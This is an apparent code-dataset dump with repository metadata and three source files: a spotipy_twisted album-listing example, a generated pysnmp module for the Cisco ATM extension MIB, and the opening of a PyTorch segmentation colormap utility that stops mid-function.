49ff2a4a5a5a9b3184b22adbe068eb91a38f3102
|
[
"MIT"
] | null | null | null |
examples/simple1.py
|
jimcortez/spotipy_twisted
|
49ff2a4a5a5a9b3184b22adbe068eb91a38f3102
|
[
"MIT"
] | null | null | null |
examples/simple1.py
|
jimcortez/spotipy_twisted
|
49ff2a4a5a5a9b3184b22adbe068eb91a38f3102
|
[
"MIT"
] | null | null | null |
import spotipy_twisted
birdy_uri = 'spotify:artist:2WX2uTcsvV5OnS0inACecP'
spotify = spotipy_twisted.Spotify()
results = spotify.artist_albums(birdy_uri, album_type='album')
albums = results['items']
while results['next']:
results = spotify.next(results)
albums.extend(results['items'])
for album in albums:
print(album['name'])
| 20.411765
| 62
| 0.743516
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 72
| 0.207493
|
8bde558284ee50c285e21e6e1f4a0e2c6265f5bf
| 21,737
|
py
|
Python
|
pysnmp-with-texts/CISCO-ATM-EXT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/CISCO-ATM-EXT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/CISCO-ATM-EXT-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module CISCO-ATM-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-ATM-EXT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:50:35 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
atmVclEntry, aal5VccEntry = mibBuilder.importSymbols("ATM-MIB", "atmVclEntry", "aal5VccEntry")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Unsigned32, iso, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Counter32, NotificationType, IpAddress, Bits, ModuleIdentity, Gauge32, MibIdentifier, Counter64, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "iso", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Counter32", "NotificationType", "IpAddress", "Bits", "ModuleIdentity", "Gauge32", "MibIdentifier", "Counter64", "ObjectIdentity")
DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue")
ciscoAtmExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 88))
ciscoAtmExtMIB.setRevisions(('2003-01-06 00:00', '1997-06-20 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoAtmExtMIB.setRevisionsDescriptions(('Added ciscoAtmVclExtOamTable for OAM configuration and state information.', 'Initial version of this MIB module.',))
if mibBuilder.loadTexts: ciscoAtmExtMIB.setLastUpdated('200301060000Z')
if mibBuilder.loadTexts: ciscoAtmExtMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoAtmExtMIB.setContactInfo(' Cisco Systems Customer Service Postal: 170 W. Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: cs-atm@cisco.com')
if mibBuilder.loadTexts: ciscoAtmExtMIB.setDescription('An extension to the Cisco ATM MIB module for managing ATM implementations. Acronyms and terms used in the MIB module: AAL5 -- ATM adaptation layer 5. AIS -- Alarm Indication Signal. CC -- Continuity Check. End-to-end -- End-to-end continuity checking. Monitoring occurs on the entire VC between two ATM end stations. F5 OAM -- OAM information flow between network elements (NEs) used within virtual connections to report degraded virtual channel performance. OAM -- Operations, Administration and Maintenance. RDI -- Remote Detection Indication. Segment -- Segment continuity checking. Monitoring occurs on a VC segment between a router and a first-hop ATM switch. VC -- Virtual Channel. VCC -- Virtual Channel Connection. VCL -- Virtual Channel Link.')
ciscoAtmExtMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 1))
cAal5VccExtMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1))
catmxVcl = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2))
class OamCCStatus(TextualConvention, Integer32):
description = 'OAM Continuity check (CC) status. ready(1) -- CC is not activated on VC. waitActiveResponse(2) -- Waiting for active-response. waitActiveConfirm(3) -- Waiting for active-confirm. active(4) -- CC is activated on VC. waitDeactiveConfirm(5) -- Waiting for deactivate confirm.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("ready", 1), ("waitActiveResponse", 2), ("waitActiveConfirm", 3), ("active", 4), ("waitDeactiveConfirm", 5))
class OamCCVcState(TextualConvention, Integer32):
description = 'OAM Continuity check (CC) VC state. verified(1) -- CC is successful. VC is up. aisrdi(2) -- CC failed. VC is down. notManaged(3) -- VC is not managed by CC.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("verified", 1), ("aisrdi", 2), ("notManaged", 3))
cAal5VccExtTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1), )
if mibBuilder.loadTexts: cAal5VccExtTable.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtTable.setDescription('This table contains AAL5 VCC performance parameters beyond that provided by cAal5VccEntry.')
cAal5VccExtEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1), )
aal5VccEntry.registerAugmentions(("CISCO-ATM-EXT-MIB", "cAal5VccExtEntry"))
cAal5VccExtEntry.setIndexNames(*aal5VccEntry.getIndexNames())
if mibBuilder.loadTexts: cAal5VccExtEntry.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtEntry.setDescription('This list contains the additinal AAL5 VCC performance parameters beyond that provided by cAal5VccEntry.')
cAal5VccExtCompEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 1), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtCompEnabled.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtCompEnabled.setDescription('Boolean, if compression enabled for VCC.')
cAal5VccExtVoice = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtVoice.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtVoice.setDescription('Boolean, TRUE if VCC is used to carry voice.')
cAal5VccExtInF5OamCells = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtInF5OamCells.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtInF5OamCells.setDescription('Number of OAM F5 end to end loopback cells received through the VCC.')
cAal5VccExtOutF5OamCells = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cAal5VccExtOutF5OamCells.setStatus('current')
if mibBuilder.loadTexts: cAal5VccExtOutF5OamCells.setDescription('Number of OAM F5 end to end loopback cells sent through the VCC.')
catmxVclOamTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1), )
if mibBuilder.loadTexts: catmxVclOamTable.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamTable.setDescription('This table contains Virtual Channel Link (VCL) Oam configuration and state information. This table augments the atmVclTable.')
catmxVclOamEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1), )
atmVclEntry.registerAugmentions(("CISCO-ATM-EXT-MIB", "catmxVclOamEntry"))
catmxVclOamEntry.setIndexNames(*atmVclEntry.getIndexNames())
if mibBuilder.loadTexts: catmxVclOamEntry.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEntry.setDescription('This list contains Virtual Channel Link (VCL) configuration and state information beyond that provided by atmVclEntry.')
catmxVclOamLoopbackFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 1), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamLoopbackFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamLoopbackFreq.setDescription('Specifies OAM loopback frequency.')
catmxVclOamRetryFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 2), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamRetryFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamRetryFreq.setDescription('Specifies OAM retry polling frequency.')
catmxVclOamUpRetryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 3), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamUpRetryCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamUpRetryCount.setDescription('Specifies OAM retry count before declaring a VC is up.')
catmxVclOamDownRetryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 4), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamDownRetryCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamDownRetryCount.setDescription('Specifies OAM retry count before declaring a VC is down.')
catmxVclOamEndCCActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 5), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamEndCCActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCActCount.setDescription('Specifies OAM End-to-end Continuity check (CC) Activation retry count.')
catmxVclOamEndCCDeActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 6), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamEndCCDeActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCDeActCount.setDescription('Specifies OAM End-to-end Continuity check (CC) Deactivation retry count.')
catmxVclOamEndCCRetryFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 7), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamEndCCRetryFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCRetryFreq.setDescription('Specifies OAM End-to-end Continuity check (CC) Activation/Deactivation retry frequency.')
catmxVclOamSegCCActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 8), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamSegCCActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCActCount.setDescription('Specifies OAM Segment Continuity check (CC) Activation retry count.')
catmxVclOamSegCCDeActCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 9), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamSegCCDeActCount.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCDeActCount.setDescription('Specifies OAM Segment Continuity check (CC) Deactivation retry count.')
catmxVclOamSegCCRetryFreq = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 10), Unsigned32()).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamSegCCRetryFreq.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCRetryFreq.setDescription('Specifies OAM Segment Continuity check (CC) Activation/Deactivation retry frequency.')
catmxVclOamManage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 11), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: catmxVclOamManage.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamManage.setDescription('Specifies OAM Enable/Disable on the VC. true(1) indicates that OAM is enabled on the VC. false(2) indicates that OAM is disabled on the VC.')
catmxVclOamLoopBkStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("disabled", 1), ("sent", 2), ("received", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamLoopBkStatus.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamLoopBkStatus.setDescription('Indicates OAM loopback status of the VC. disabled(1) -- No OAMs on this VC. sent(2) -- OAM sent, waiting for echo. received(3) -- OAM received from target. failed(4) -- Last OAM did not return.')
catmxVclOamVcState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("downRetry", 1), ("verified", 2), ("notVerified", 3), ("upRetry", 4), ("aisRDI", 5), ("aisOut", 6), ("notManaged", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamVcState.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamVcState.setDescription('Indicates the state of VC OAM. downRetry(1) -- Loopback failed. Retry sending loopbacks with retry frequency. VC is up. verified(2) -- Loopback is successful. notVerified(3) -- Not verified by loopback, AIS/RDI conditions are cleared. upRetry(4) -- Retry successive loopbacks. VC is down. aisRDI(5) -- Received AIS/RDI. Loopback are not sent in this state. aisOut(6) -- Sending AIS. Loopback and reply are not sent in this state. notManaged(7) -- VC is not managed by OAM.')
catmxVclOamEndCCStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 14), OamCCStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamEndCCStatus.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCStatus.setDescription('Indicates OAM End-to-end Continuity check (CC) status.')
catmxVclOamSegCCStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 15), OamCCStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamSegCCStatus.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCStatus.setDescription('Indicates OAM Segment Continuity check (CC) status.')
catmxVclOamEndCCVcState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 16), OamCCVcState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamEndCCVcState.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamEndCCVcState.setDescription('Indicates OAM End-to-end Continuity check (CC) VC state.')
catmxVclOamSegCCVcState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 17), OamCCVcState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamSegCCVcState.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamSegCCVcState.setDescription('Indicates OAM Segment Continuity check (CC) VC state.')
catmxVclOamCellsReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 18), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamCellsReceived.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamCellsReceived.setDescription('Indicates the number of OAM cells received on this VC.')
catmxVclOamCellsSent = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 19), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamCellsSent.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamCellsSent.setDescription('Indicates the number of OAM cells sent on this VC.')
catmxVclOamCellsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 20), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamCellsDropped.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamCellsDropped.setDescription('Indicates the number of OAM cells dropped on this VC.')
catmxVclOamInF5ais = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 21), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamInF5ais.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamInF5ais.setDescription('Indicates the number of received OAM F5 Alarm Indication Signal (AIS) cells from the VC.')
catmxVclOamOutF5ais = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 22), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamOutF5ais.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamOutF5ais.setDescription('Indicates the number of transmitted OAM F5 Alarm Indication Signal (AIS) cells to the VC.')
catmxVclOamInF5rdi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 23), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamInF5rdi.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamInF5rdi.setDescription('Indicates the number of received OAM F5 Remote Detection Indication (RDI) cells from the VC.')
catmxVclOamOutF5rdi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 88, 1, 2, 1, 1, 24), Counter32()).setUnits('cells').setMaxAccess("readonly")
if mibBuilder.loadTexts: catmxVclOamOutF5rdi.setStatus('current')
if mibBuilder.loadTexts: catmxVclOamOutF5rdi.setDescription('Indicates the number of transmitted OAM F5 Remote Detection Indication (RDI) cells to the VC.')
ciscoAal5ExtMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 2))
ciscoAal5ExtMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 1))
ciscoAal5ExtMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 2))
ciscoAal5ExtMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 1, 1)).setObjects(("CISCO-ATM-EXT-MIB", "ciscoAal5ExtMIBGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAal5ExtMIBCompliance = ciscoAal5ExtMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: ciscoAal5ExtMIBCompliance.setDescription('This compliance is deprecated in favour of ciscoAal5ExtMIBComplianceRev1. The compliance statement for entities which implement this Cisco AAL5 Extention MIB and support data compression or voice features.')
ciscoAal5ExtMIBComplianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 1, 2)).setObjects(("CISCO-ATM-EXT-MIB", "ciscoAal5ExtMIBGroup"), ("CISCO-ATM-EXT-MIB", "ciscoAtmExtVclOamGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAal5ExtMIBComplianceRev1 = ciscoAal5ExtMIBComplianceRev1.setStatus('current')
if mibBuilder.loadTexts: ciscoAal5ExtMIBComplianceRev1.setDescription('The compliance statement for entities which implement CISCO-ATM-EXT-MIB.')
ciscoAal5ExtMIBGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 2, 1)).setObjects(("CISCO-ATM-EXT-MIB", "cAal5VccExtCompEnabled"), ("CISCO-ATM-EXT-MIB", "cAal5VccExtVoice"), ("CISCO-ATM-EXT-MIB", "cAal5VccExtInF5OamCells"), ("CISCO-ATM-EXT-MIB", "cAal5VccExtOutF5OamCells"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAal5ExtMIBGroup = ciscoAal5ExtMIBGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoAal5ExtMIBGroup.setDescription('A collection of objects providing AAL5 related parameters.')
ciscoAtmExtVclOamGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 88, 2, 2, 2)).setObjects(("CISCO-ATM-EXT-MIB", "catmxVclOamLoopbackFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamRetryFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamUpRetryCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamDownRetryCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCDeActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCRetryFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCDeActCount"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCRetryFreq"), ("CISCO-ATM-EXT-MIB", "catmxVclOamManage"), ("CISCO-ATM-EXT-MIB", "catmxVclOamLoopBkStatus"), ("CISCO-ATM-EXT-MIB", "catmxVclOamVcState"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCStatus"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCStatus"), ("CISCO-ATM-EXT-MIB", "catmxVclOamEndCCVcState"), ("CISCO-ATM-EXT-MIB", "catmxVclOamSegCCVcState"), ("CISCO-ATM-EXT-MIB", "catmxVclOamCellsReceived"), ("CISCO-ATM-EXT-MIB", "catmxVclOamCellsSent"), ("CISCO-ATM-EXT-MIB", "catmxVclOamCellsDropped"), ("CISCO-ATM-EXT-MIB", "catmxVclOamInF5ais"), ("CISCO-ATM-EXT-MIB", "catmxVclOamOutF5ais"), ("CISCO-ATM-EXT-MIB", "catmxVclOamInF5rdi"), ("CISCO-ATM-EXT-MIB", "catmxVclOamOutF5rdi"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoAtmExtVclOamGroup = ciscoAtmExtVclOamGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoAtmExtVclOamGroup.setDescription('A collection of objects providing Virtual Channel Link (VCL) OAM configuration and state information.')
mibBuilder.exportSymbols("CISCO-ATM-EXT-MIB", catmxVclOamSegCCDeActCount=catmxVclOamSegCCDeActCount, catmxVclOamUpRetryCount=catmxVclOamUpRetryCount, cAal5VccExtVoice=cAal5VccExtVoice, catmxVclOamCellsDropped=catmxVclOamCellsDropped, ciscoAal5ExtMIBGroup=ciscoAal5ExtMIBGroup, catmxVclOamEndCCStatus=catmxVclOamEndCCStatus, catmxVclOamEndCCVcState=catmxVclOamEndCCVcState, catmxVclOamSegCCRetryFreq=catmxVclOamSegCCRetryFreq, ciscoAtmExtMIB=ciscoAtmExtMIB, catmxVclOamSegCCActCount=catmxVclOamSegCCActCount, catmxVclOamLoopBkStatus=catmxVclOamLoopBkStatus, catmxVclOamSegCCStatus=catmxVclOamSegCCStatus, cAal5VccExtTable=cAal5VccExtTable, ciscoAal5ExtMIBCompliance=ciscoAal5ExtMIBCompliance, PYSNMP_MODULE_ID=ciscoAtmExtMIB, cAal5VccExtEntry=cAal5VccExtEntry, catmxVclOamVcState=catmxVclOamVcState, ciscoAtmExtMIBObjects=ciscoAtmExtMIBObjects, catmxVclOamOutF5rdi=catmxVclOamOutF5rdi, ciscoAal5ExtMIBConformance=ciscoAal5ExtMIBConformance, OamCCStatus=OamCCStatus, catmxVclOamTable=catmxVclOamTable, catmxVclOamDownRetryCount=catmxVclOamDownRetryCount, catmxVclOamManage=catmxVclOamManage, catmxVclOamEndCCRetryFreq=catmxVclOamEndCCRetryFreq, ciscoAal5ExtMIBGroups=ciscoAal5ExtMIBGroups, catmxVclOamInF5ais=catmxVclOamInF5ais, cAal5VccExtCompEnabled=cAal5VccExtCompEnabled, OamCCVcState=OamCCVcState, catmxVclOamEndCCActCount=catmxVclOamEndCCActCount, catmxVclOamSegCCVcState=catmxVclOamSegCCVcState, catmxVclOamEntry=catmxVclOamEntry, catmxVclOamEndCCDeActCount=catmxVclOamEndCCDeActCount, catmxVcl=catmxVcl, cAal5VccExtInF5OamCells=cAal5VccExtInF5OamCells, cAal5VccExtOutF5OamCells=cAal5VccExtOutF5OamCells, catmxVclOamOutF5ais=catmxVclOamOutF5ais, ciscoAal5ExtMIBCompliances=ciscoAal5ExtMIBCompliances, catmxVclOamRetryFreq=catmxVclOamRetryFreq, catmxVclOamInF5rdi=catmxVclOamInF5rdi, catmxVclOamCellsReceived=catmxVclOamCellsReceived, catmxVclOamLoopbackFreq=catmxVclOamLoopbackFreq, cAal5VccExtMIBObjects=cAal5VccExtMIBObjects, catmxVclOamCellsSent=catmxVclOamCellsSent, ciscoAtmExtVclOamGroup=ciscoAtmExtVclOamGroup, ciscoAal5ExtMIBComplianceRev1=ciscoAal5ExtMIBComplianceRev1)
| 134.179012
| 2,083
| 0.776096
| 1,022
| 0.047017
| 0
| 0
| 0
| 0
| 0
| 0
| 8,161
| 0.375443
|
8bdf0a8fc72d26035fdc4522645b4d01820727b6
| 4,905
|
py
|
Python
|
arrows/pytorch/seg_utils.py
|
neal-siekierski/kwiver
|
1c97ad72c8b6237cb4b9618665d042be16825005
|
[
"BSD-3-Clause"
] | null | null | null |
arrows/pytorch/seg_utils.py
|
neal-siekierski/kwiver
|
1c97ad72c8b6237cb4b9618665d042be16825005
|
[
"BSD-3-Clause"
] | null | null | null |
arrows/pytorch/seg_utils.py
|
neal-siekierski/kwiver
|
1c97ad72c8b6237cb4b9618665d042be16825005
|
[
"BSD-3-Clause"
] | null | null | null |
# ckwg +28
# Copyright 2018 by Kitware, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither name of Kitware, Inc. nor the names of any contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import six
import warnings
import numpy as np
import torch
try:
import cv2
except ImportError:
cv2 = None
def bitget(byteval, idx):
return ((byteval & (1 << idx)) != 0)
def label_colormap(N=256):
cmap = np.zeros((N, 3))
for i in six.moves.range(0, N):
id = i
r, g, b = 0, 0, 0
for j in six.moves.range(0, 8):
r = np.bitwise_or(r, (bitget(id, 0) << 7 - j))
g = np.bitwise_or(g, (bitget(id, 1) << 7 - j))
b = np.bitwise_or(b, (bitget(id, 2) << 7 - j))
id = (id >> 3)
cmap[i, 0] = r
cmap[i, 1] = g
cmap[i, 2] = b
cmap = cmap.astype(np.float32) / 255
cmap = (cmap * 255).astype(np.uint8)
return cmap
def label2rgb(lbl, img=None, label_names=None, n_labels=None,
alpha=0.3, thresh_suppress=0):
import skimage.color
if label_names is None:
if n_labels is None:
n_labels = lbl.max() + 1 # +1 for bg_label 0
else:
if n_labels is None:
n_labels = len(label_names)
else:
assert n_labels == len(label_names)
cmap = label_colormap(n_labels)
lbl_viz = cmap[lbl]
lbl_viz[lbl == -1] = (0, 0, 0) # unlabeled
if img is not None:
